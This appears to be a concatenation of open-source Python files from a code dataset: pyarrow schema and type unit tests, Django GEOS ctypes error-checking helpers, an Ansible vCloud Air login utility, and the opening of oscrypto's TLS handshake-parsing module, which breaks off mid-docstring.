# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from collections import OrderedDict import pickle import sys import weakref import pytest import numpy as np import pyarrow as pa import pyarrow.tests.util as test_util from pyarrow.vendored.version import Version def test_schema_constructor_errors(): msg = ("Do not call Schema's constructor directly, use `pyarrow.schema` " "instead") with pytest.raises(TypeError, match=msg): pa.Schema() def test_type_integers(): dtypes = ['int8', 'int16', 'int32', 'int64', 'uint8', 'uint16', 'uint32', 'uint64'] for name in dtypes: factory = getattr(pa, name) t = factory() assert str(t) == name def test_type_to_pandas_dtype(): M8_ns = np.dtype('datetime64[ns]') cases = [ (pa.null(), np.object_), (pa.bool_(), np.bool_), (pa.int8(), np.int8), (pa.int16(), np.int16), (pa.int32(), np.int32), (pa.int64(), np.int64), (pa.uint8(), np.uint8), (pa.uint16(), np.uint16), (pa.uint32(), np.uint32), (pa.uint64(), np.uint64), (pa.float16(), np.float16), (pa.float32(), np.float32), (pa.float64(), np.float64), (pa.date32(), M8_ns), (pa.date64(), M8_ns), (pa.timestamp('ms'), M8_ns), (pa.binary(), np.object_), (pa.binary(12), np.object_), (pa.string(), np.object_), (pa.list_(pa.int8()), np.object_), # (pa.list_(pa.int8(), 2), 
np.object_), # TODO needs pandas conversion (pa.map_(pa.int64(), pa.float64()), np.object_), ] for arrow_type, numpy_type in cases: assert arrow_type.to_pandas_dtype() == numpy_type @pytest.mark.pandas def test_type_to_pandas_dtype_check_import(): # ARROW-7980 test_util.invoke_script('arrow_7980.py') def test_type_list(): value_type = pa.int32() list_type = pa.list_(value_type) assert str(list_type) == 'list<item: int32>' field = pa.field('my_item', pa.string()) l2 = pa.list_(field) assert str(l2) == 'list<my_item: string>' def test_type_comparisons(): val = pa.int32() assert val == pa.int32() assert val == 'int32' assert val != 5 def test_type_for_alias(): cases = [ ('i1', pa.int8()), ('int8', pa.int8()), ('i2', pa.int16()), ('int16', pa.int16()), ('i4', pa.int32()), ('int32', pa.int32()), ('i8', pa.int64()), ('int64', pa.int64()), ('u1', pa.uint8()), ('uint8', pa.uint8()), ('u2', pa.uint16()), ('uint16', pa.uint16()), ('u4', pa.uint32()), ('uint32', pa.uint32()), ('u8', pa.uint64()), ('uint64', pa.uint64()), ('f4', pa.float32()), ('float32', pa.float32()), ('f8', pa.float64()), ('float64', pa.float64()), ('date32', pa.date32()), ('date64', pa.date64()), ('string', pa.string()), ('str', pa.string()), ('binary', pa.binary()), ('time32[s]', pa.time32('s')), ('time32[ms]', pa.time32('ms')), ('time64[us]', pa.time64('us')), ('time64[ns]', pa.time64('ns')), ('timestamp[s]', pa.timestamp('s')), ('timestamp[ms]', pa.timestamp('ms')), ('timestamp[us]', pa.timestamp('us')), ('timestamp[ns]', pa.timestamp('ns')), ('duration[s]', pa.duration('s')), ('duration[ms]', pa.duration('ms')), ('duration[us]', pa.duration('us')), ('duration[ns]', pa.duration('ns')), ] for val, expected in cases: assert pa.type_for_alias(val) == expected def test_type_string(): t = pa.string() assert str(t) == 'string' def test_type_timestamp_with_tz(): tz = 'America/Los_Angeles' t = pa.timestamp('ns', tz=tz) assert t.unit == 'ns' assert t.tz == tz def test_time_types(): t1 = pa.time32('s') t2 = 
pa.time32('ms') t3 = pa.time64('us') t4 = pa.time64('ns') assert t1.unit == 's' assert t2.unit == 'ms' assert t3.unit == 'us' assert t4.unit == 'ns' assert str(t1) == 'time32[s]' assert str(t4) == 'time64[ns]' with pytest.raises(ValueError): pa.time32('us') with pytest.raises(ValueError): pa.time64('s') def test_from_numpy_dtype(): cases = [ (np.dtype('bool'), pa.bool_()), (np.dtype('int8'), pa.int8()), (np.dtype('int16'), pa.int16()), (np.dtype('int32'), pa.int32()), (np.dtype('int64'), pa.int64()), (np.dtype('uint8'), pa.uint8()), (np.dtype('uint16'), pa.uint16()), (np.dtype('uint32'), pa.uint32()), (np.dtype('float16'), pa.float16()), (np.dtype('float32'), pa.float32()), (np.dtype('float64'), pa.float64()), (np.dtype('U'), pa.string()), (np.dtype('S'), pa.binary()), (np.dtype('datetime64[s]'), pa.timestamp('s')), (np.dtype('datetime64[ms]'), pa.timestamp('ms')), (np.dtype('datetime64[us]'), pa.timestamp('us')), (np.dtype('datetime64[ns]'), pa.timestamp('ns')), (np.dtype('timedelta64[s]'), pa.duration('s')), (np.dtype('timedelta64[ms]'), pa.duration('ms')), (np.dtype('timedelta64[us]'), pa.duration('us')), (np.dtype('timedelta64[ns]'), pa.duration('ns')), ] for dt, pt in cases: result = pa.from_numpy_dtype(dt) assert result == pt # Things convertible to numpy dtypes work assert pa.from_numpy_dtype('U') == pa.string() assert pa.from_numpy_dtype(np.str_) == pa.string() assert pa.from_numpy_dtype('int32') == pa.int32() assert pa.from_numpy_dtype(bool) == pa.bool_() with pytest.raises(NotImplementedError): pa.from_numpy_dtype(np.dtype('O')) with pytest.raises(TypeError): pa.from_numpy_dtype('not_convertible_to_dtype') def test_schema(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] sch = pa.schema(fields) assert sch.names == ['foo', 'bar', 'baz'] assert sch.types == [pa.int32(), pa.string(), pa.list_(pa.int8())] assert len(sch) == 3 assert sch[0].name == 'foo' assert sch[0].type == fields[0].type assert 
sch.field('foo').name == 'foo' assert sch.field('foo').type == fields[0].type assert repr(sch) == """\ foo: int32 bar: string baz: list<item: int8> child 0, item: int8""" with pytest.raises(TypeError): pa.schema([None]) def test_schema_weakref(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] schema = pa.schema(fields) wr = weakref.ref(schema) assert wr() is not None del schema assert wr() is None def test_schema_to_string_with_metadata(): lorem = """\ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla accumsan vel turpis et mollis. Aliquam tincidunt arcu id tortor blandit blandit. Donec eget leo quis lectus scelerisque varius. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Praesent faucibus, diam eu volutpat iaculis, tellus est porta ligula, a efficitur turpis nulla facilisis quam. Aliquam vitae lorem erat. Proin a dolor ac libero dignissim mollis vitae eu mauris. Quisque posuere tellus vitae massa pellentesque sagittis. Aenean feugiat, diam ac dignissim fermentum, lorem sapien commodo massa, vel volutpat orci nisi eu justo. Nulla non blandit sapien. 
Quisque pretium vestibulum urna eu vehicula.""" # ARROW-7063 my_schema = pa.schema([pa.field("foo", "int32", False, metadata={"key1": "value1"}), pa.field("bar", "string", True, metadata={"key3": "value3"})], metadata={"lorem": lorem}) assert my_schema.to_string() == """\ foo: int32 not null -- field metadata -- key1: 'value1' bar: string -- field metadata -- key3: 'value3' -- schema metadata -- lorem: '""" + lorem[:65] + "' + " + str(len(lorem) - 65) # Metadata that exactly fits result = pa.schema([('f0', 'int32')], metadata={'key': 'value' + 'x' * 62}).to_string() assert result == """\ f0: int32 -- schema metadata -- key: 'valuexxxxxxxxxxxxxxxxxxxxxxxxxxxxx\ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'""" assert my_schema.to_string(truncate_metadata=False) == """\ foo: int32 not null -- field metadata -- key1: 'value1' bar: string -- field metadata -- key3: 'value3' -- schema metadata -- lorem: '{}'""".format(lorem) assert my_schema.to_string(truncate_metadata=False, show_field_metadata=False) == """\ foo: int32 not null bar: string -- schema metadata -- lorem: '{}'""".format(lorem) assert my_schema.to_string(truncate_metadata=False, show_schema_metadata=False) == """\ foo: int32 not null -- field metadata -- key1: 'value1' bar: string -- field metadata -- key3: 'value3'""" assert my_schema.to_string(truncate_metadata=False, show_field_metadata=False, show_schema_metadata=False) == """\ foo: int32 not null bar: string""" def test_schema_from_tuples(): fields = [ ('foo', pa.int32()), ('bar', pa.string()), ('baz', pa.list_(pa.int8())), ] sch = pa.schema(fields) assert sch.names == ['foo', 'bar', 'baz'] assert sch.types == [pa.int32(), pa.string(), pa.list_(pa.int8())] assert len(sch) == 3 assert repr(sch) == """\ foo: int32 bar: string baz: list<item: int8> child 0, item: int8""" with pytest.raises(TypeError): pa.schema([('foo', None)]) def test_schema_from_mapping(): fields = OrderedDict([ ('foo', pa.int32()), ('bar', pa.string()), ('baz', pa.list_(pa.int8())), ]) sch = 
pa.schema(fields) assert sch.names == ['foo', 'bar', 'baz'] assert sch.types == [pa.int32(), pa.string(), pa.list_(pa.int8())] assert len(sch) == 3 assert repr(sch) == """\ foo: int32 bar: string baz: list<item: int8> child 0, item: int8""" fields = OrderedDict([('foo', None)]) with pytest.raises(TypeError): pa.schema(fields) def test_schema_duplicate_fields(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('foo', pa.list_(pa.int8())), ] sch = pa.schema(fields) assert sch.names == ['foo', 'bar', 'foo'] assert sch.types == [pa.int32(), pa.string(), pa.list_(pa.int8())] assert len(sch) == 3 assert repr(sch) == """\ foo: int32 bar: string foo: list<item: int8> child 0, item: int8""" assert sch[0].name == 'foo' assert sch[0].type == fields[0].type with pytest.warns(FutureWarning): assert sch.field_by_name('bar') == fields[1] with pytest.warns(FutureWarning): assert sch.field_by_name('xxx') is None with pytest.warns((UserWarning, FutureWarning)): assert sch.field_by_name('foo') is None # Schema::GetFieldIndex assert sch.get_field_index('foo') == -1 # Schema::GetAllFieldIndices assert sch.get_all_field_indices('foo') == [0, 2] def test_field_flatten(): f0 = pa.field('foo', pa.int32()).with_metadata({b'foo': b'bar'}) assert f0.flatten() == [f0] f1 = pa.field('bar', pa.float64(), nullable=False) ff = pa.field('ff', pa.struct([f0, f1]), nullable=False) assert ff.flatten() == [ pa.field('ff.foo', pa.int32()).with_metadata({b'foo': b'bar'}), pa.field('ff.bar', pa.float64(), nullable=False)] # XXX # Nullable parent makes flattened child nullable ff = pa.field('ff', pa.struct([f0, f1])) assert ff.flatten() == [ pa.field('ff.foo', pa.int32()).with_metadata({b'foo': b'bar'}), pa.field('ff.bar', pa.float64())] fff = pa.field('fff', pa.struct([ff])) assert fff.flatten() == [pa.field('fff.ff', pa.struct([f0, f1]))] def test_schema_add_remove_metadata(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', 
pa.list_(pa.int8())) ] s1 = pa.schema(fields) assert s1.metadata is None metadata = {b'foo': b'bar', b'pandas': b'badger'} s2 = s1.with_metadata(metadata) assert s2.metadata == metadata s3 = s2.remove_metadata() assert s3.metadata is None # idempotent s4 = s3.remove_metadata() assert s4.metadata is None def test_schema_equals(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] metadata = {b'foo': b'bar', b'pandas': b'badger'} sch1 = pa.schema(fields) sch2 = pa.schema(fields) sch3 = pa.schema(fields, metadata=metadata) sch4 = pa.schema(fields, metadata=metadata) assert sch1.equals(sch2, check_metadata=True) assert sch3.equals(sch4, check_metadata=True) assert sch1.equals(sch3) assert not sch1.equals(sch3, check_metadata=True) assert not sch1.equals(sch3, check_metadata=True) del fields[-1] sch3 = pa.schema(fields) assert not sch1.equals(sch3) def test_schema_equals_propagates_check_metadata(): # ARROW-4088 schema1 = pa.schema([ pa.field('foo', pa.int32()), pa.field('bar', pa.string()) ]) schema2 = pa.schema([ pa.field('foo', pa.int32()), pa.field('bar', pa.string(), metadata={'a': 'alpha'}), ]) assert not schema1.equals(schema2, check_metadata=True) assert schema1.equals(schema2) def test_schema_equals_invalid_type(): # ARROW-5873 schema = pa.schema([pa.field("a", pa.int64())]) for val in [None, 'string', pa.array([1, 2])]: with pytest.raises(TypeError): schema.equals(val) def test_schema_equality_operators(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] metadata = {b'foo': b'bar', b'pandas': b'badger'} sch1 = pa.schema(fields) sch2 = pa.schema(fields) sch3 = pa.schema(fields, metadata=metadata) sch4 = pa.schema(fields, metadata=metadata) assert sch1 == sch2 assert sch3 == sch4 # __eq__ and __ne__ do not check metadata assert sch1 == sch3 assert not sch1 != sch3 assert sch2 == sch4 # comparison with other types doesn't raise assert sch1 != [] 
assert sch3 != 'foo' def test_schema_get_fields(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] schema = pa.schema(fields) assert schema.field('foo').name == 'foo' assert schema.field(0).name == 'foo' assert schema.field(-1).name == 'baz' with pytest.raises(KeyError): schema.field('other') with pytest.raises(TypeError): schema.field(0.0) with pytest.raises(IndexError): schema.field(4) def test_schema_negative_indexing(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] schema = pa.schema(fields) assert schema[-1].equals(schema[2]) assert schema[-2].equals(schema[1]) assert schema[-3].equals(schema[0]) with pytest.raises(IndexError): schema[-4] with pytest.raises(IndexError): schema[3] def test_schema_repr_with_dictionaries(): fields = [ pa.field('one', pa.dictionary(pa.int16(), pa.string())), pa.field('two', pa.int32()) ] sch = pa.schema(fields) expected = ( """\ one: dictionary<values=string, indices=int16, ordered=0> two: int32""") assert repr(sch) == expected def test_type_schema_pickling(): cases = [ pa.int8(), pa.string(), pa.binary(), pa.binary(10), pa.list_(pa.string()), pa.map_(pa.string(), pa.int8()), pa.struct([ pa.field('a', 'int8'), pa.field('b', 'string') ]), pa.union([ pa.field('a', pa.int8()), pa.field('b', pa.int16()) ], pa.lib.UnionMode_SPARSE), pa.union([ pa.field('a', pa.int8()), pa.field('b', pa.int16()) ], pa.lib.UnionMode_DENSE), pa.time32('s'), pa.time64('us'), pa.date32(), pa.date64(), pa.timestamp('ms'), pa.timestamp('ns'), pa.decimal128(12, 2), pa.decimal256(76, 38), pa.field('a', 'string', metadata={b'foo': b'bar'}) ] for val in cases: roundtripped = pickle.loads(pickle.dumps(val)) assert val == roundtripped fields = [] for i, f in enumerate(cases): if isinstance(f, pa.Field): fields.append(f) else: fields.append(pa.field('_f{}'.format(i), f)) schema = pa.schema(fields, metadata={b'foo': b'bar'}) roundtripped = 
pickle.loads(pickle.dumps(schema)) assert schema == roundtripped def test_empty_table(): schema1 = pa.schema([ pa.field('f0', pa.int64()), pa.field('f1', pa.dictionary(pa.int32(), pa.string())), pa.field('f2', pa.list_(pa.list_(pa.int64()))), ]) # test it preserves field nullability schema2 = pa.schema([ pa.field('a', pa.int64(), nullable=False), pa.field('b', pa.int64()) ]) for schema in [schema1, schema2]: table = schema.empty_table() assert isinstance(table, pa.Table) assert table.num_rows == 0 assert table.schema == schema @pytest.mark.pandas def test_schema_from_pandas(): import pandas as pd inputs = [ list(range(10)), pd.Categorical(list(range(10))), ['foo', 'bar', None, 'baz', 'qux'], np.array([ '2007-07-13T01:23:34.123456789', '2006-01-13T12:34:56.432539784', '2010-08-13T05:46:57.437699912' ], dtype='datetime64[ns]'), ] if Version(pd.__version__) >= Version('1.0.0'): inputs.append(pd.array([1, 2, None], dtype=pd.Int32Dtype())) for data in inputs: df = pd.DataFrame({'a': data}) schema = pa.Schema.from_pandas(df) expected = pa.Table.from_pandas(df).schema assert schema == expected def test_schema_sizeof(): schema = pa.schema([ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), ]) assert sys.getsizeof(schema) > 30 schema2 = schema.with_metadata({"key": "some metadata"}) assert sys.getsizeof(schema2) > sys.getsizeof(schema) schema3 = schema.with_metadata({"key": "some more metadata"}) assert sys.getsizeof(schema3) > sys.getsizeof(schema2) def test_schema_merge(): a = pa.schema([ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ]) b = pa.schema([ pa.field('foo', pa.int32()), pa.field('qux', pa.bool_()) ]) c = pa.schema([ pa.field('quux', pa.dictionary(pa.int32(), pa.string())) ]) d = pa.schema([ pa.field('foo', pa.int64()), pa.field('qux', pa.bool_()) ]) result = pa.unify_schemas([a, b, c]) expected = pa.schema([ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())), 
pa.field('qux', pa.bool_()), pa.field('quux', pa.dictionary(pa.int32(), pa.string())) ]) assert result.equals(expected) with pytest.raises(pa.ArrowInvalid): pa.unify_schemas([b, d]) def test_undecodable_metadata(): # ARROW-10214: undecodable metadata shouldn't fail repr() data1 = b'abcdef\xff\x00' data2 = b'ghijkl\xff\x00' schema = pa.schema( [pa.field('ints', pa.int16(), metadata={'key': data1})], metadata={'key': data2}) assert 'abcdef' in str(schema) assert 'ghijkl' in str(schema)
apache-2.0
density215/d215-miniblog
django/contrib/gis/geos/prototypes/errcheck.py
623
3522
""" Error checking functions for GEOS ctypes prototype functions. """ import os from ctypes import c_void_p, string_at, CDLL from django.contrib.gis.geos.error import GEOSException from django.contrib.gis.geos.libgeos import GEOS_VERSION from django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc # Getting the `free` routine used to free the memory allocated for # string pointers returned by GEOS. if GEOS_VERSION >= (3, 1, 1): # In versions 3.1.1 and above, `GEOSFree` was added to the C API # because `free` isn't always available on all platforms. free = GEOSFunc('GEOSFree') free.argtypes = [c_void_p] free.restype = None else: # Getting the `free` routine from the C library of the platform. if os.name == 'nt': # On NT, use the MS C library. libc = CDLL('msvcrt') else: # On POSIX platforms C library is obtained by passing None into `CDLL`. libc = CDLL(None) free = libc.free ### ctypes error checking routines ### def last_arg_byref(args): "Returns the last C argument's value by reference." return args[-1]._obj.value def check_dbl(result, func, cargs): "Checks the status code and returns the double value passed in by reference." # Checking the status code if result != 1: return None # Double passed in by reference, return its value. return last_arg_byref(cargs) def check_geom(result, func, cargs): "Error checking on routines that return Geometries." if not result: raise GEOSException('Error encountered checking Geometry returned from GEOS C function "%s".' % func.__name__) return result def check_minus_one(result, func, cargs): "Error checking on routines that should not return -1." if result == -1: raise GEOSException('Error encountered in GEOS C function "%s".' % func.__name__) else: return result def check_predicate(result, func, cargs): "Error checking for unary/binary predicate functions." 
val = ord(result) # getting the ordinal from the character if val == 1: return True elif val == 0: return False else: raise GEOSException('Error encountered on GEOS C predicate function "%s".' % func.__name__) def check_sized_string(result, func, cargs): """ Error checking for routines that return explicitly sized strings. This frees the memory allocated by GEOS at the result pointer. """ if not result: raise GEOSException('Invalid string pointer returned by GEOS C function "%s"' % func.__name__) # A c_size_t object is passed in by reference for the second # argument on these routines, and its needed to determine the # correct size. s = string_at(result, last_arg_byref(cargs)) # Freeing the memory allocated within GEOS free(result) return s def check_string(result, func, cargs): """ Error checking for routines that return strings. This frees the memory allocated by GEOS at the result pointer. """ if not result: raise GEOSException('Error encountered checking string return value in GEOS C function "%s".' % func.__name__) # Getting the string value at the pointer address. s = string_at(result) # Freeing the memory allocated within GEOS free(result) return s def check_zero(result, func, cargs): "Error checking on routines that should not return 0." if result == 0: raise GEOSException('Error encountered in GEOS C function "%s".' % func.__name__) else: return result
bsd-3-clause
mensler/ansible
lib/ansible/module_utils/vca.py
77
11149
# # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. import os try: from pyvcloud.vcloudair import VCA HAS_PYVCLOUD = True except ImportError: HAS_PYVCLOUD = False from ansible.module_utils.basic import AnsibleModule SERVICE_MAP = {'vca': 'ondemand', 'vchs': 'subscription', 'vcd': 'vcd'} LOGIN_HOST = {'vca': 'vca.vmware.com', 'vchs': 'vchs.vmware.com'} DEFAULT_SERVICE_TYPE = 'vca' DEFAULT_VERSION = '5.7' class VcaError(Exception): def __init__(self, msg, **kwargs): self.kwargs = kwargs super(VcaError, self).__init__(msg) def vca_argument_spec(): return dict( username=dict(type='str', aliases=['user'], required=True), password=dict(type='str', aliases=['pass','passwd'], required=True, no_log=True), org=dict(), service_id=dict(), instance_id=dict(), host=dict(), api_version=dict(default=DEFAULT_VERSION), service_type=dict(default=DEFAULT_SERVICE_TYPE, choices=SERVICE_MAP.keys()), vdc_name=dict(), gateway_name=dict(default='gateway'), verify_certs=dict(type='bool', default=True) ) class VcaAnsibleModule(AnsibleModule): def __init__(self, *args, **kwargs): argument_spec = vca_argument_spec() argument_spec.update(kwargs.get('argument_spec', dict())) kwargs['argument_spec'] = argument_spec super(VcaAnsibleModule, self).__init__(*args, **kwargs) if not HAS_PYVCLOUD: self.fail("python module pyvcloud is required for this module") self._vca = self.create_instance() self.login() 
self._gateway = None self._vdc = None @property def vca(self): return self._vca @property def gateway(self): if self._gateway is not None: return self._gateway vdc_name = self.params['vdc_name'] gateway_name = self.params['gateway_name'] _gateway = self.vca.get_gateway(vdc_name, gateway_name) if not _gateway: raise VcaError('vca instance has no gateway named %s' % gateway_name) self._gateway = _gateway return _gateway @property def vdc(self): if self._vdc is not None: return self._vdc vdc_name = self.params['vdc_name'] _vdc = self.vca.get_vdc(vdc_name) if not _vdc: raise VcaError('vca instance has no vdc named %s' % vdc_name) self._vdc = _vdc return _vdc def get_vapp(self, vapp_name): vapp = self.vca.get_vapp(self.vdc, vapp_name) if not vapp: raise VcaError('vca instance has no vapp named %s' % vapp_name) return vapp def get_vm(self, vapp_name, vm_name): vapp = self.get_vapp(vapp_name) children = vapp.me.get_Children() vms = [vm for vm in children.get_Vm() if vm.name == vm_name] try: return vms[0] except IndexError: raise VcaError('vapp has no vm named %s' % vm_name) def create_instance(self): service_type = self.params.get('service_type', DEFAULT_SERVICE_TYPE) if service_type == 'vcd': host = self.params['host'] else: host = LOGIN_HOST[service_type] username = self.params['username'] version = self.params.get('api_version') if service_type == 'vchs': version = '5.6' verify = self.params.get('verify_certs') return VCA(host=host, username=username, service_type=SERVICE_MAP[service_type], version=version, verify=verify) def login(self): service_type = self.params['service_type'] password = self.params['password'] login_org = None if service_type == 'vcd': login_org = self.params['org'] if not self.vca.login(password=password, org=login_org): self.fail('Login to VCA failed', response=self.vca.response) try: method_name = 'login_%s' % service_type meth = getattr(self, method_name) meth() except AttributeError: self.fail('no login method exists for service_type %s' % 
service_type) except VcaError as e: self.fail(e.message, response=self.vca.response, **e.kwargs) def login_vca(self): instance_id = self.params['instance_id'] if not instance_id: raise VcaError('missing required instance_id for service_type vca') self.vca.login_to_instance_sso(instance=instance_id) def login_vchs(self): service_id = self.params['service_id'] if not service_id: raise VcaError('missing required service_id for service_type vchs') org = self.params['org'] if not org: raise VcaError('missing required org for service_type vchs') self.vca.login_to_org(service_id, org) def login_vcd(self): org = self.params['org'] if not org: raise VcaError('missing required org for service_type vcd') if not self.vca.token: raise VcaError('unable to get token for service_type vcd') if not self.vca.vcloud_session.org_url: raise VcaError('unable to get org_url for service_type vcd') self.vca.login(token=self.vca.token, org=org, org_url=self.vca.vcloud_session.org_url) def save_services_config(self, blocking=True): task = self.gateway.save_services_configuration() if not task: self.fail(msg='unable to save gateway services configuration') if blocking: self.vca.block_until_completed(task) def fail(self, msg, **kwargs): self.fail_json(msg=msg, **kwargs) def exit(self, **kwargs): self.exit_json(**kwargs) # ------------------------------------------------------------- # 9/18/2015 @privateip # All of the functions below here were migrated from the original # vca_* modules. 
All functions below should be considered deprecated # and will be removed once all of the vca_* modules have been updated # to use the new instance module above # ------------------------------------------------------------- VCA_REQ_ARGS = ['instance_id', 'vdc_name'] VCHS_REQ_ARGS = ['service_id'] VCD_REQ_ARGS = [] def _validate_module(module): if not HAS_PYVCLOUD: module.fail_json(msg="python module pyvcloud is needed for this module") service_type = module.params.get('service_type', DEFAULT_SERVICE_TYPE) if service_type == 'vca': for arg in VCA_REQ_ARGS: if module.params.get(arg) is None: module.fail_json(msg="argument %s is mandatory when service type " "is vca" % arg) if service_type == 'vchs': for arg in VCHS_REQ_ARGS: if module.params.get(arg) is None: module.fail_json(msg="argument %s is mandatory when service type " "is vchs" % arg) if service_type == 'vcd': for arg in VCD_REQ_ARGS: if module.params.get(arg) is None: module.fail_json(msg="argument %s is mandatory when service type " "is vcd" % arg) def serialize_instances(instance_list): instances = [] for i in instance_list: instances.append(dict(apiUrl=i['apiUrl'], instance_id=i['id'])) return instances def _vca_login(vca, password, instance): if not vca.login(password=password): raise VcaError("Login Failed: Please check username or password", error=vca.response.content) if not vca.login_to_instance_sso(instance=instance): s_json = serialize_instances(vca.instances) raise VcaError("Login to Instance failed: Seems like instance_id provided " "is wrong .. 
Please check", valid_instances=s_json) return vca def _vchs_login(vca, password, service, org): if not vca.login(password=password): raise VcaError("Login Failed: Please check username or password", error=vca.response.content) if not vca.login_to_org(service, org): raise VcaError("Failed to login to org, Please check the orgname", error=vca.response.content) def _vcd_login(vca, password, org): # TODO: this function needs to be refactored if not vca.login(password=password, org=org): raise VcaError("Login Failed: Please check username or password " "or host parameters") if not vca.login(password=password, org=org): raise VcaError("Failed to get the token", error=vca.response.content) if not vca.login(token=vca.token, org=org, org_url=vca.vcloud_session.org_url): raise VcaError("Failed to login to org", error=vca.response.content) def vca_login(module): service_type = module.params.get('service_type') username = module.params.get('username') password = module.params.get('password') instance = module.params.get('instance_id') org = module.params.get('org') vdc_name = module.params.get('vdc_name') service = module.params.get('service_id') version = module.params.get('api_version') verify = module.params.get('verify_certs') _validate_module(module) if not vdc_name and service_type == 'vchs': vdc_name = module.params.get('service_id') if not org and service_type == 'vchs': org = vdc_name or service if service_type == 'vcd': host = module.params.get('host') else: host = LOGIN_HOST[service_type] username = os.environ.get('VCA_USER', username) password = os.environ.get('VCA_PASS', password) if not username or not password: msg = "Either the username or password is not set, please check args" module.fail_json(msg=msg) if service_type == 'vchs': version = '5.6' elif service_type == 'vcd' and not version: version == '5.6' vca = VCA(host=host, username=username, service_type=SERVICE_MAP[service_type], version=version, verify=verify) try: if service_type == 'vca': 
_vca_login(vca, password, instance) elif service_type == 'vchs': _vchs_login(vca, password, service, org) elif service_type == 'vcd': _vcd_login(vca, password, org) except VcaError as e: module.fail_json(msg=e.message, **e.kwargs) return vca
gpl-3.0
igor-rangel7l/novoigorrangel.repository
plugin.video.SportsDevil/service/oscrypto/_tls.py
7
16431
# coding: utf-8 from __future__ import unicode_literals, division, absolute_import, print_function import re from datetime import datetime from asn1crypto.util import int_from_bytes, timezone from asn1crypto.x509 import Certificate from ._cipher_suites import CIPHER_SUITE_MAP from .errors import TLSVerificationError, TLSError __all__ = [ 'detect_client_auth_request', 'extract_chain', 'get_dh_params_length', 'parse_session_info', 'raise_client_auth', 'raise_dh_params', 'raise_disconnection', 'raise_expired_not_yet_valid', 'raise_handshake', 'raise_hostname', 'raise_no_issuer', 'raise_protocol_error', 'raise_revoked', 'raise_self_signed', 'raise_verification', 'raise_weak_signature', ] def extract_chain(server_handshake_bytes): """ Extracts the X.509 certificates from the server handshake bytes for use when debugging :param server_handshake_bytes: A byte string of the handshake data received from the server :return: A list of asn1crypto.x509.Certificate objects """ output = [] chain_bytes = None for record_type, _, record_data in _parse_tls_records(server_handshake_bytes): if record_type != b'\x16': continue for message_type, message_data in _parse_handshake_messages(record_data): if message_type == b'\x0b': chain_bytes = message_data break if chain_bytes: break if chain_bytes: # The first 3 bytes are the cert chain length pointer = 3 while pointer < len(chain_bytes): cert_length = int_from_bytes(chain_bytes[pointer:pointer + 3]) cert_start = pointer + 3 cert_end = cert_start + cert_length pointer = cert_end cert_bytes = chain_bytes[cert_start:cert_end] output.append(Certificate.load(cert_bytes)) return output def detect_client_auth_request(server_handshake_bytes): """ Determines if a CertificateRequest message is sent from the server asking the client for a certificate :param server_handshake_bytes: A byte string of the handshake data received from the server :return: A boolean - if a client certificate request was found """ for record_type, _, record_data in 
_parse_tls_records(server_handshake_bytes): if record_type != b'\x16': continue for message_type, message_data in _parse_handshake_messages(record_data): if message_type == b'\x0d': return True return False def get_dh_params_length(server_handshake_bytes): """ Determines the length of the DH params from the ServerKeyExchange :param server_handshake_bytes: A byte string of the handshake data received from the server :return: None or an integer of the bit size of the DH parameters """ output = None dh_params_bytes = None for record_type, _, record_data in _parse_tls_records(server_handshake_bytes): if record_type != b'\x16': continue for message_type, message_data in _parse_handshake_messages(record_data): if message_type == b'\x0c': dh_params_bytes = message_data break if dh_params_bytes: break if dh_params_bytes: output = int_from_bytes(dh_params_bytes[0:2]) * 8 return output def parse_session_info(server_handshake_bytes, client_handshake_bytes): """ Parse the TLS handshake from the client to the server to extract information including the cipher suite selected, if compression is enabled, the session id and if a new or reused session ticket exists. 
